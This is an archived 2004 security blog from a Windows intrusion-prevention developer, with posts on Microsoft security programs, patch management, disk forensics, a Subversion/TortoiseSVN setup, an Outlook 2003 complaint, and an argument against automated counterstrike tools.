March 31, 2004

Microsoft Progress Report: Security

Bill Gates fired off one of Microsoft's periodic "Executive E-mail" blasts today to customers to revisits Microsoft's ongoing security initiatives. In the email he goes into discussion on four key areas:

  • Isolation and Resiliency
  • Updating
  • Quality
  • Authentication and Access Control
I will let you judge for yourself on his views. Personally, I quite enjoyed reading the email. I was quite interested in some of the stats he spoke of as it relates to their new code quality efforts. Here is a quick summary:

  • The number of "critical" or "important" security bulletins issued for Windows Server 2003, compared to Windows 2000 Server, dropped from 40 to 9 in the first 320 days each product was on the market.
  • Similarly, for SQL Server 2000, there were 3 bulletins issued in the 15 months after release of Service Pack 3, compared to 13 bulletins in the 15 months prior to its release.
  • With Exchange 2000 SP3, there was just 1 bulletin in the 21 months after its release, compared to 7 bulletins in the 21 months prior.
Anyways, take some time and go read the email. In the meantime, lets end this entry quoting Bill:
Technology has come an incredibly long way in the past two decades, and it is far too important to let a few criminals stop the rest of us from enjoying its amazing benefits.

Amen.

Posted by SilverStr at 07:33 PM | Comments (1) | TrackBack

March 29, 2004

Patching vs. Intrusion Prevention

I better start this entry off by stating that for a living (what puts bread on my table) I write computer security tools and technology, with my latest research into mandatory access control driven by providing "process rights management" through host-based intrusion prevention. Ya its a mouthful, but basically I have written code that grafts onto the Windows kernel to strengthen the Windows platform by providing application confinement and isolation from the rest of the system. The result is that I can apply the rules of least privilege to resources on a machine and provide a safe containment... isolating suspect or even hostile activities from destroying a system.

The reason I am telling you this is that today I noticed a debate on Network World called "Is patch mgmt. the best protection against vulnerabilities?" in which Shavlik Technologies (for) and Sana Security (against) face off. Its hard to say this without you snickering at me, but I HATE it when you square off two vendors to make an assessment for the information security profession when both have a stake in their position. (In case you didn't know Shavlik sells patch management software and Sana sells intrusion prevention software) lt is typically biased, and slanted towards their product.

Lets get real. The reality is BOTH are right, and BOTH are wrong for different reasons. Lets look at this from an infosec point of view while understanding the mindset of an administrator responsible for the critical infrastructure of an organization.

Patch management is only effective when actually completed on a timely manner to reduce the threat of exposure from attack. If you look at the the most recent trends most attack vectors are built AFTER a patch is released, as it is much easier for an attacker to disassemble a patch to find the vulnerabilities(s) in question, and create new hostile code to exploit it. The "for" camp in this argument state that application and OS vendors don't always tell you what the patch fixes, which means you need to patch against the unknown. Here is the problem with that argument. How can an administrator of a Fortune 100 company blindly patch a system with code he knows nothing about... especially if you KNOW the vendor isn't telling you everything? They can't. Which is why they typically do a staged roll out in a 'clean room' to do regression testing against their existing architecture. And in many cases.. the patches do more harm to their system than good. Countless avenues of attack are meanwhile generated, exposing the business to more risk. The time between patch release and exploit release is shortening, as attackers get smarter in their disassembly techniques.

On the other side, the "against" camp state that because customers are not aware of new vulnerabilities they cannot defend against the new exploits... but host-based intrusion prevention software will solve it. There is a catch they don't want to tell you. Most intrusion prevention systems use a combination of signature based techniques and whitelist databases to determine access control. Problem with this is that new 0 day attacks don't play by these rules, and they can typically get around such techniques. More over, if you use a stringent set of rules of "don't"... you end up with an administrative nightmare trying to tune the IPS to work in your environment.

Proof is in how signature based solutions have failed in other security verticals. Look at antivirus and personal firewalls as an example. The latest CSI/FBI Computer Crime and Security Survey shows that of those organizations that reported breaches in the last 12 months, 98% had firewalls in place, and 99% had antivirus. Yet they were still breached. Does that mean we throw the technology out? No. It just means that they don't work alone, in isolated environments. And how much MORE extent would the breach have been WITHOUT the technology in place?

To properly defend against the digital divide, we need to use a layered defensive posture which includes it all. We should have firewalls, antivirus, network IDS, host-based IPS and patch management. Our decisions have to be of a BIGGER process in the security management lifecycle. (This is why Schneier says security is a process, not a product) Remember when I was talking about the 8 rules of Information Security last year? Using a defensive posture like this touches on almost every rule:

  • You need to control change management. (Rule of Change Management) You cannot blindly apply patches, but you need to be vigilant and ensure all systems are up to date. Staged roll out is one way to test the change management process and fully understand the implications of the changes.
  • Its not just about applying technology and leaving it alone. (Rule of the Three-Fold Process). You must include monitoring and administration to ensure you keep up to date. Patch management systems are great for this.
  • You must consider everything hostile, and then slowly allow things to happen on your systems. (A combination of the Rule of Least Privilege and the Rule of Trust). Host-based intrusion prevention is perfect for that, when properly tuned and in force.
  • Keeping up with patches ensure that you are strengthening your weakest points at all time. (Rule of Preventative Action)
  • Host-based intrusion prevention not only DETECTS attacks, it can PREVENT them. Thats the whole point of them. As such, you can immediately respond to threats as they occur in a sane manner using the logs/reports to provide forensic audits of the attack. (The Rule of Immediate and Proper Response). Hell, my IPS system will even go so far as to terminate the attack in mid-execution if it matches certain criteria (defined by the adminstrator of course)

My point here folks is that as vendors, we sometimes seem to use FUD or "tainted" messeging to sell out products. Don't buy into it. (And if you ever see my company do it, please email me with stern warning and point me to this entry) Always consider the bigger picture in your security management lifecycle when evaluating technology. After all... technology is simply an enabler. Its not the solution!

Oh... and if you ARE going to roll out host-based intrusion prevention on Microsoft Windows servers, contact me. I might be able to help you out. :)

Posted by SilverStr at 09:15 AM | TrackBack

March 26, 2004

Network and disk forensics

Earlier this week I was a guest lecturer at BCIT, in which I did my presentation on doing a forensic analysis of of a compromised Linux hard drive. I used the same slide deck that I used to present at FVLUG and SFU, but used a different live demo, actually showing an attack to insert a script into cron that emailed the passwd file. Although the slide deck on its own isn't the most useful, for those students that were there, this will be a great help to merge with the notes they took during the demo.

One of the questions brought up was if this technique could be used on Windows hard disks. Yes it can, but you need to use some of the other tools in sleuthkit. As long as you have a valid dd image, you should be ok.

While looking for some other NTFS toolkits, I found a new one I never tried before called FLAG, which stands for "Forensic and Log Analysis GUI". This has some potential for those people that wish to analyze an NTFS system on a Linux forensic machine. There is even a screenshot of FLAG browsing through the registry offline, as well as another one reconstructing jpegs from a dd image on the fly.

When I have some time I am going to see about cranking out something similar in .NET for Windows. FLAG looks kewl, but to be honest I would like to see something like this for information professionals who use Windows but cannot afford tools like EnCase, Forensic Toolkit, iLook etc or dedicated forensics machine like those from DIBS USA or Digital Intelligence.

Course, I rarely have that kind of time, so that might not get very far. Maybe if I just ported grave-robber, ils, ils2mac and mactime that would go a far ways to letting people do work on Windows. Who knows.

Anyways, if you got a few moments, and are into digital forensics give FLAG a try. You can get the Knoppix-enabled ISO here (MD5 Checksum) from the Australian Department of Defense.

Posted by SilverStr at 10:24 AM | TrackBack

Arcterex... you rock!

There is a saying out there that goes something like "a friend won't tell when you kill someone... but a really good friend would help you bury the body". I just wanted to thank Alan for helping me 'bury a body' so to speak tonight.

In less than an hour, at 11:30 at night I drove out to his place to completely swap out a motherboard, rebuild a kernel and get one of my servers back up and running for an install at the ISP tomorrow. The result? A faster machine I am actually comfortable with taking to the ISP. No video problems. Lots of ram that is properly being recognized. Hard drives running at peak effectiveness. And the kicker... a BIOS that properly handles power management. (Don't ask.. its a LONG story)

Anyways... thanks Alan. You rock!

Posted by SilverStr at 01:32 AM | Comments (1) | TrackBack

March 25, 2004

Trip down memory lane

Alan was going through some old home dirs on one of his servers, when he came across an old account of mine from back in 1999.

After being told to stroll down memory lane I did, and OMG. I forgot what my desktops used to look like.

Anyways, for your amusement, here were screenshots I took of my desktop back in 1999.

The first one was my main development machine back then, and the second one was my laptop, which I still use today for some forensics work. (Its only got a 486 capable of 800x600, so it pretty much sucks except for console work)

So, got any interesting shots from back before the turn of the century for me to see?

Posted by SilverStr at 11:34 AM | Comments (10) | TrackBack

March 24, 2004

Proactive sales in a small ISV

Eric has posted a great MSDN article on the function of proactive sales in a small ISV.

I love reading his insights on this sort of thing. As the owner of a small ISV myself I completely understand and relate to his writings. This article is no different. Wrestling the question about when and if to get a sales guy is important, and understanding a sales guys traits it quite difficult. He answers this question quite well.

Good job Eric.

Posted by SilverStr at 09:32 PM | TrackBack

Analysis of the Exploitation Processes

Steven Hill (aka:"SolarIce") from Covert Systems Research has released a paper on gaining either horizontal or vertical escalation of privileges through the use of exploitation of particular vulnerabilities in processes.

Discussing things like stack, heap and function pointer overwrites, as well as format string vulnerabilities, its worth reading if you want to see how it is technically done.

You should have a pretty good grasp of gcc and gdb if you want to really understand what is going on. All and all though, its a pretty good read.... although Steven admits its far from being a complete work on the subject.

Happy reading.

Posted by SilverStr at 08:02 AM | TrackBack

March 22, 2004

IT Security at Microsoft

Microsoft has released a great slide deck and Word document discussing what the Microsoft Corporate Security group does to prevent malicious or unauthorized use of digital assets at Microsoft.

It is very interesting to see how their asset protection takes place through a formal risk management framework, risk management processes, and clear organizational roles and responsibilities. The basis of the approach is recognition that risk is an inherent part of any environment and that risk should be proactively managed. They say that the principles and techniques described can be employed to manage risk at any organization.

Its well worth your time to see how they present the information. Although this is not really "new" information, its interesting to see Microsoft so open about it. And man.. their slide decks sure are looking much better now adays.

Enjoy.

Posted by SilverStr at 09:17 PM | Comments (2) | TrackBack

Handbook of Information Security Management

The CISSP Open Study Guides Web Site in collaboration with Auerbach have released the content online for the book "Handbook of Information Security Management".

Personally I prefer to read books in analog( ie: paper) form, since its much more comfortable, but if you are into reading an entire book online, check it out.

Of course, this does give me more incentive to rethink the idea of getting a TabletPC... :)

Posted by SilverStr at 12:02 AM | TrackBack

March 21, 2004

Windows XP Service Pack 2 Preview available for download

Microsoft has released a technical preview of Windows XP Service Pack 2 (XPSP2) that you can now download from the Internet.

I have been running a version earlier than RC1 and it has been pretty stable, but that has been in an isolated environment which is pretty clean. I have not yet moved this to any of my production systems, and don't intent to just yet.

If you are curious about looking at XPSP2RC1 (holy acronym batman) this preview will aid you in planning and testing for the deployment of Windows XP SP2 later this year.

Feel free to download it now and give it a try in VMWare, VirtualPC or an isolated machine.

Posted by SilverStr at 11:54 PM | TrackBack

March 18, 2004

Techniques for Securing Private Objects in Your Applications

Have you ever wanted to know how you can extend the Windows operating system's rich security features to your own applications? Well there is an interesting article that was published on MSDN this morning that explains just how to do that.

It is focused more on C++, but is quite useful to all programmers. It provides a good introduction to understanding the difference between things like tokens, security descriptors and ACL, and the author aimed to help make security programming practical and approachable with this article.

If you are doing any sort of coding on Windows and care about securing your objects, I suggest you read this.

Enjoy.

Posted by SilverStr at 10:12 AM | TrackBack

Quality software means more secure software

I found a great article/interview on ComputerWorld with Gary McGraw, discussing hacker exploits and the state of software quality.

I just can't wait to get Gary's book. If his writing style is anything like his interview style, it should be really good.

Anyways, if you are into learning Gary's take on building more secure software by writing better quality software, consider reading the interview.

Posted by SilverStr at 12:03 AM | Comments (1) | TrackBack

March 16, 2004

Microsoft releases new tool to monitor network ports

Microsoft has released a new tool today called Port Reporter (PortRptr.exe) that will log TCP and UDP port activity on a local Windows system.

On Windows XP and Windows Server 2003 this service is able to log which ports are used, which process is using the port, if the process is a service, which modules the process has loaded and which user account is running the process.

On Windows 2000 systems, this service is limited to logging which ports are used and when. In both cases the information that the service provides can be helpful for security purposes, troubleshooting scenarios, and profiling systems’ port usage.

This is a small, but really useful tool that runs as a service. I suggest you download it and give it a try if you are curious about the ports open on your machine(s).

Posted by SilverStr at 11:27 AM | Comments (4) | TrackBack

Neat Windows Shell Trick to Launch CMD Window

Today I learned a neat little shell trick thanks to my buddy Gareth.

Have you ever been browsing in Explorer and want to drop down to a CMD window at that point? Not easy. You can open a cmd window, drag the path in Explorer to the cmd window as a drop target and then go from there. But he showed me a neat hack to the registry to make it a right click menu option!

Steps to add this:

  1. Start regedit
  2. Open HKEY_CLASSES_ROOT\Directory\shell
  3. Add a new key called 'cmd' (without the quotes)
  4. Edit the (Default) string and name it whatever you want the menuitem to say. I put 'Open CMD here'
  5. Add a subkey called 'command' (without the quotes)
  6. Edit the (Default) string and add the following: cmd.exe /k "cd %L"

Now if you right click on a folder, you will have an 'Open CMD here' option which opens the cmd prompt right at that location!

Easy hack... really nice result.

Posted by SilverStr at 10:03 AM | Comments (4) | TrackBack

March 15, 2004

Trustworthy Messaging at Microsoft

Microsoft has published some information about their internal need for trustworthy messaging, and how they solved it.

They needed to use email for transmitting business-sensitive data but was concerned about security and data privacy. Microsoft's internal IT group deployed a solution they called trustworthy messaging, offering both senders and recipients three levels of protection for their data. These solutions were based on applying Secure Multipurpose Internet Mail Extensions (S/MIME) digital signatures, S/MIME encryption, and/or rights management policies.

Anyways, if you are interested Microsoft has released a small slidedeck (not that useful) and a Word document (much better than the slidedeck) that gives a glimpse at their thought process on the topic.

Enjoy.

Posted by SilverStr at 01:21 PM | TrackBack

March 14, 2004

Subversion + TortoiseSVN = AWESOME SCM solution

Ok, so belay my last message about running Subversion along side of CVS. I don't need to. Subversion is working PERFECTLY.

I spent yesterday setting things up... and all I can say is OMG. I have never been so impressed with how quickly everything snapped together as it relates to developer tools.

TortoiseSVN has made all the difference. It is just amazing. It has such slick integration directly into explorer its not even funny. Here is a screen shot of one of my C# code trees checked out of my Subversion repository:

With shell extensions turned on it gives an awesome icon overlay to immediately tell me if a file is out of sync, needs to be checked in etc. As you can see in that shot, Dacl.cs has been altered and needs to be checked in. A simple right click on it and hit "Commit" will do that. Or I could step out a directory or two, and it will recursively find which files need to be checked in, and do it for me.

It uses SSH2 and tunnels nice and cleanly through just about everything. The only issue I still need to resolve is how to get the client to use my ssh keys so I don't have to enter my password on every action. It seems to prompt me twice each time I take an action, and thats a bit annoying at times. Apparently its just a config option to get the TortoiseSVNPlink ssh agent to work... I just haven't gotten around to figuring that out yet.

The Tortoise Merge and Diff utils work great. I have already used it last night to do some compares, and it "just worked" for me. I like it when I don't have to think and the tool does exactly what they are supposed to do without me having to fuss with it.

I am running Subversion in standalone server mode, and NOT through Apache. I prefer to use the rule of separation for such tasks and I was able to do that nicely, configuring it to work as an unprivileged user with no access except to the source code repo. Here are the steps I took to basically get things going on the Linux side of things (using Debian as my base):

  1. apt-get install subversion
  2. adduser svn
  3. mkdir /var/svn
  4. svnadmin create /var/svn (Creates the initial repository. I spent more time figuring out how to do that then anything else)
  5. chown -R svn.devteam /var/svn (devteam is my corporate developer group on the server)
  6. chmod 775 /var/svn
  7. cd /var/svn
  8. chmod g+w db (group needs write access to the repo)
  9. chmod g+w locks (group needs write access to the file locks)
  10. cd db
  11. chmod 440 * (no one outside of svn and the dev team should be touching these files anyways)
  12. cd ../locks
  13. chmod 440 * (no one outside of svn and the dev team should be touching these files anyways)
  14. su svn
  15. crontab -e
  16. When in crontab add this: @reboot svnserve -t -r /var/svn
  17. :x (or whatever your save and exit key sequence is)
  18. svnserve -t -r /var/svn (Need to start it for the first time, since it would seem silly to reboot at this point)
  19. exit
  20. vi /etc/password and change the shell from /bin/bash to /bin/false for the svn user

Thats it. At that point I have Subversion running as user svn, with the local repo stored in /var/svn, accessable using SSH tunneling for the development group.

To access it with TortoiseSVN I just do a checkout via a right click and then type: svn+ssh://dana@vulscan.com/ProjectTakeOverTheWorld/ and go to town coding my Pinky and the Brain Mind Altering Operating System. (Better knowns as PATBMAOS, or Longhorn for short)

I still have to get used to how Subversion works, and I could have done a better job by reading their docs BEFORE importing all my code. I wish I would have known to use their format of repository/project/trunk, repository/project/branches and repository/project/tags for the dir structure. Not sure how that will muck up my branches and tags. Will have to wait and see.

So, end result? I would sum it up as:

  • I have a completely integrated SCM solution working on my Windows dev machine that...
  • ... has its client completely integrated into Explorer,
  • ... with the server working on our existing Linux architecture with very little resource overhead,
  • ... which tunnels over SSH,
  • ... works similar to CVS,
  • ... but doesn't leave file crud in my master sources like CVS,
  • ... can be easily sandboxed and does NOT require external servers (ie webservers, although it can if you want)
  • ... was extremely easy to learn to use, with almost no learning curve past normal SCM operations
  • ... cost me NOTHING for the software, and implimentation costs were less than an hour
If you look back at my original requirements it met every need except for direct access to Visual Studio. And I am ok with that. To be honest, I am HAPPIER with it working directly in Explorer. Since most of my code is driven through kernelmode development using the DDK, I would have had to use the client outside of Visual Studio most of the time anyways. By using the same explorer window for both my VS based code and my DDK based code, I have a seamless and exactly same process for any code I work on.

So there you have it. Subversion + TortoiseSVN = My SCM solution. And I am quite happy with how it turned out.

Posted by SilverStr at 09:05 AM | Comments (5) | TrackBack

March 13, 2004

Sorry Microsoft, but Outlook 2003 doesn't make the cut

I'm sorry but Outlook 2003 is just not the productive application Microsoft wants you to believe it is. I know Robert says its his god-send for productivity, but after using it now for over a month and a half, I have to agree with Chris and nuke it. I just can't stand how it STOPS my productivity. I even tried asking for help earlier on my blog, and got a few concerned emails from people... but no one had a clue how to diagnose and fix this. And I just can't put up with it any longer.

I was looking SO forward to using Outlook 2003 with Business Contact Manager it wasn't funny. I tried EVERYTHING I could think of to get it to work for my needs, but its just impossible. Let me explain why it sucks so bad...

IMAP over SSL polling freezes. It actually HANGS Outlook 2003 on me, preventing me from reading email in other folders as its checking for mail. I can't even flip over to my calander while a polling event is occuring... its just that badly designed. Compound that with the fact that Outlook is polling for me every 2 minutes... it means basically that Outlook is hung MOST of the time.

This is a sad state when an app of Outlook's sophistication can't even handle multithreading between views, folders or even messages. What is WORSE here is that Microsoft KNOWS about this! In Microsoft Knowledge Base Article 826807 they say... and I quote: "When you work with an e-mail message on an Internet Message Access Protocol (IMAP) server, no other action in Microsoft Outlook occurs until the current action that is being processed is finished. If you do not want to wait for the process to complete, the only way to stop the process is to force Outlook to shutdown in Windows Task Manager.". They go on to say it could be a latency issue (not likely ... its on a 100 MB backbone with the server being 6 feet away), and leaves my to shudder in fear any time it tried to get mail.

If you put your tinfoil hat on for a moment, you start wondering if this is on purpose. This doesn't exist on Exchange servers. And their IMAP polling in Outlook Express works fine. Funny how that works isn't it? It's just got to be a conspiracy to covertly get people to move to Exchange. *sigh* Ok, maybe not... but I can't fathem why mail polling is this poorly designed for IMAP in outlook, but works fine in Outlook Express.

So in the interm, I installed Thunderbird and giving that a try for mail. Works great. Super fast, no hanging, I can read messages while its downloading others etc etc.

Now I just got to find a separate app that will control my calander (Mozilla calander sucks), contacts and Business contact management (perhaps I will look at GoldMine or Act again) and sync to my Handspring Prism.

You lost a customer today Microsoft. I wanted so badly to have my desktop running purely the latest and greatest from Microsoft on a daily basis. But when I can't even check my mail without Outlook freezing, its time to move on. Hell, even Pine or mutt would be better than Outlook 2003. And that's saying a lot.

Posted by SilverStr at 03:50 PM | Comments (3) | TrackBack

March 12, 2004

Update on my Source Control Trials

Well, if you recall a while back I had a call out about SCM solutions as I wanted to get away from my combination of command line cvs +ssh +cygwin for source control management.

Since that time, I have reviewed several solutions and still haven't come to a system I am completely happy with. They all have pieces that I like, and most have things that I DON'T like.

Right now I am leaning towards the use of Subversion with TortoiseSVN Windows shell extensions. Let me explain why this solution might work for me:

  • Has all the things I liked in CVS
  • Fixes most of the stuff I don't like about CVS. ie: Directories, renames, and file meta-data are versioned, support for atomic checkins and better branching
  • Speaking of branching, it now has no extra "cost" in doing so. There is no expensive overhead as there is in CVS. It deals with tags WAY different.
  • Handles binaries just like txt files. YAHOO!! (*My number one beef with CVS, besides CVS throwing garbage in every one of my directories*)
  • TortioseSVN seems easy to use and actually looks nice. No cumbersome and complex ugly looking UI to make the entire process more complex then it needs to be
  • Subversion server works on my existing Linux machines
  • No reliance on a web server to run (but can use Apache with WebDav)
  • Cost. Its free!

If it wasn't for finding TortioseSVN, I would have probably went with Perforce. Perforce also works on my Linux servers, and the UI seemed decent enough. I will let you know how it goes as I begin to actually use the new system on a daily basis concurrently with my existing solution. Hopefully within a month or two I will phase out cvs through cygwin and exclusively run through TortoiseSVN with Subversion.

I'll let you know how it goes.

Posted by SilverStr at 03:21 PM | TrackBack

March 11, 2004

Application Security Best Practices at Microsoft

Microsoft has released a slide deck and white paper on their Application Security Assurance Program.

Microsoft founded the Application Security Assurance Program (ASAP) to inventory, assess, and—when necessary—ensure resolution of security vulnerability issues found in line-of-business applications. Topics include the program's criteria for assessing applications, the participants in the review process, the requirements for a secure application environment, lessons learned while evaluating applications at Microsoft, and best practices for enhancing the security of applications in development.

Posted by SilverStr at 01:10 AM | TrackBack

March 10, 2004

Rules of Engagement for Information Warfare

On March 31st of this year, Symbiot Security contends that the rules for information warfare are going to change.

Mike Erwin, Symbiot's president, and Paco Nathan, its chief scientist, have released a whitepaper entitled "On the Rules of Engagement for Information Warfare" which details the idea that best practices for information security in the private sector have focused only on defense, and needs to look at offense to provide complete defense.

Drawing on the lawful military doctrine of necessity and proportionality, they believe that as infosec professionals we have the right to counterstrike hostile intent with the subsequence use of force in self-defense.

In other words, when hostile intent such as a DoS flood begins to attack you, they believe that you have the right to attack them through the escalation of response. (Think DEFCON for the Internet) Although this may seem like immediate and proper response to some, this is flawed. Let me explain why.

In the physical world, history has shown that the necessity and proportionality of response has been riddled with erroneous decisions which have potentially done more damage than good. Escalating DEFCON levels have brought our world to the brink of a nuclear war on various occassions during the cold war because of such actions. Rules, roles and responsibilities have kept intelligence agencies in check as they balance off response with GOOD intelligence... sifting through potentially covert actions from third parties and building a complete threat analysis before attacking. Even this fails... as we have seen in the case of erroneous intelligence that triggered the US to invade Iraq. (I will side step the political minefield here and assume for a moment that the President of the Unites States acted in good faith... we can deal with conspiracy theories later).

Now lets come back from that tangent and reflect on such actions in the digital world. The underlying protocols used to control the Internet were never originally designed to deal with non-repudiation, nor were they ever designed to guarantee upper layer authenticity. In other words, it is quite easy to spoof a target at every layer of the OSI stack, providing multiple attack vectors to any data stream. Based on the probable level of threat, they believe the use of a scale of force to block hostile acts - or degrade the network quality of service for indeterminate acts can be the first steps in analysis of the target... allowing for reflection with a final 'return fire' action to counterstrike the hostile source.

In my opinion the idea is noble, but the implimentation is flawed. The use of such escalation tactics with such agressive counterstrike capabilities in cyberspace has the added risk of failure in automated determination, which will allow attackers to more easily launch strikes covertly against their real intended targets. There is a REASON why in the physical world there is a need for two separate keys and a authenticity launch code for nuclear weapons on submarines. It is to prevent such actions. No such safeguards have been proposed during even the first stage of hostile source analysis. Immediately upon responding to a threat by degrading any sort of service past your own ownership boundaries, you are breaching the remote hosts network, making you no better than the hostile source.

Let me see if I can clear that up. In many cases attacks are launched by zombie platforms, 'owned' remote machines allowing the attacker to not only mask their original location, but also their original intent. It is not uncommon for an attack vector to come through vulnerable and exploited systems that reside on home computers or unpatches remote desktops like those used by roaming users. But here is the problem. Both ends go through networks YOU don't own. When you counterstrike "grandma's" computer", you are also affecting grandma's ISP. And all routes in between. You now are part of the problem, not part of the solution.

But it gets worse. What happens if both endpoint providers use a scale of force to engage in defense/counter-defense? Arming procedures for the escalation of response could go from non-destructive to destructive and non-recoverable actions in mere moments. Without human response... or with human response of those in an operation center that truly don't know of the threats that they are really susceptible to.

The idea is noble, and I too would like to attack the bastards that attack me. However, you cannot guarantee that the proper target is 'in your sights'. From the brief whitepaper it seems that they believe that human interaction is required in the operation center to analyze and escalate response. This would HAVE to be essential... because if you automate it... you will be building the biggest 'cyberweapon' launch pad the Internet has ever seen.

Yet the weakest link in security is the human factor. Checks and balances have to be in place to ensure that there is no misconfiguration... or hostile intent by the person(s) working with the system. The last thing you need is a person that escalates a response against his 'former employer' in a retaliatory strike. Who is going to monitor the monitors? This is a vicious circle.

I don't think its fair of me to criticize Symbiot's ideas blindly without providing alternatives. To be honest, I don't believe I can properly respond to their rules until I understand them better... which won't be until after March 31st. Until then, we can only speculate in how they intend to do it. For me.... this counterstrike approach is ethically wrong. (And in many jurisdictions legally wrong as well) There is no evidence that this is a more effective way to deal with the current threats we are exposed to, and there is quite a bit of historical precedence that indicates it is totally counterproductive. On top of that, its this type of "whitehat" tool which would be turned around and be used by the "blackhat" community as another attack platform. The last thing we need is another commercial product that is specifically designed to attack other systems.

But... that is just my opinion. And I am biased. I write digital defensive tools for a living. You would think I would welcome this... since it would increase my business *lol* But I don't.

And nor should you.

Posted by SilverStr at 10:36 AM | Comments (1) | TrackBack

March 08, 2004

Exploiting Software:How to break code

Sorry for the lack of posts. Quite swamped here lately with some of my own work.

Stuck my head out for a bit and saw an interesting post from Gary about the fact one of his sample chapters from his book (Exploiting Software: How to break code) is online for your reading pleasure.

I took a quick read through the chapter over lunch, and I must say it looks REALLY good. I am going to need to add it to my list of books to pick up on my next reading frenzie. I am actually heading out in a couple of weeks to relax on a nice secluded island away from computers for a few days... and I might just take Gary's book with me (assuming I get it in time of course)

Anyways, you can head over to Amazon to order your copy today! Let me know what you think of it if you read it in the next week or so, just in case my expectations are too high. (I doubt it, Gary is a kewl guy)

Now to wrestle with a big delimma.... do I order and read Security Warrior first, or Exploiting Software: How to break code?

What do you think?

Posted by SilverStr at 06:17 PM | Comments (8) | TrackBack

March 04, 2004

Interesting research on application security metrics

Chris sent a good post on SC-L yesterday about some research @stake did on application security metrics. Although the findings are mostly focused on web application security, its still quite interesting. Especially since this was completed before OWASP really took off. I thought I would post it here because I know I am going to reference its findings in the future.


@stake published its first application security metrics report in April 2002.
It is an analyis of 45 "e-business" applications that @stake assessed for its
clients. Most are web applications.

The Security of Applications: Not All Are Created Equal
http://www.atstake.com/research/reports/acrobat/atstake_app_unequal.pdf

@stake found that 70% of the defects analyzed were design flaws that could
have been found using threat modelling and secure design reviews before the
implementation stage of development.

62% of the apps allowed access controls to be bypassed 27% had no
prevention of brute force attacks against passwords 71% had poor input
validation.

@stake lists the top 10 categories of application defects found. The list
predates the OWASP Top 10 by eleven months and is largely the same.
The data has percentage of applications effected and is ranked, so it is not
anecdotal.

The is a follow-up of the first application defect study done 15 months later in
July, 2003. This was done to see if application security is improving.

The Security of Applications, Reloaded
http://www.atstake.com/research/reports/acrobat/atstake_app_reloaded.pdf

The results found that security is improving overall but that there is a widening
gap between the security quality of the top quartile of applications and the
bottom quartile.

There is another article that 3 @stake authors wrote for IEEE Security and
Privacy Magazine which contains elements from both reports.

Information Security: Why the Future Belongs to the Quants
http://www.atstake.com/research/reports/acrobat/ieee_quant.pdf

Cheers,
Chris

Thanks Chris! Good information here.

Posted by SilverStr at 12:26 PM | TrackBack

Chuckle for the day

Ken pointed out a really interesting comic strip by FoxTrot on the SecureCoding mailing list today:

Ya, I chuckled too.

Posted by SilverStr at 12:18 PM | Comments (2) | TrackBack

March 02, 2004

Microsoft Security Guidance Kit CD v1.0

I noticed a link on Microsoft's Security Guidance Center that you can pre-order the Microsoft Security Guidance Kit CD v1.0

The CD-ROM contains tools, templates, roadmaps and how-to guides in addition to Microsoft's prescriptive security guidance. The kit is designed to help you implement measures like automating security patch installation and blocking unsafe email attachments to help your organization stay protected.

There is no cost for the CD, and Microsoft is covering the shipping too! I already ordered mine, and I suggest you do the same.

Posted by SilverStr at 10:16 AM | Comments (4) | TrackBack

March 01, 2004

A friendlier NSA for your Kids!

Well, it seems the NSA have went and redone their website. It actually looks pretty good.

More interesting is the section they now have for kids. I was quite impressed with it. Lots of neat information for the budding cryptanalyst. I am going to have my daughter check it out when she gets home from school today. She might enjoy it.

I only wish the CSE would do stuff like this. *sigh*

Posted by SilverStr at 11:44 AM | Comments (2) | TrackBack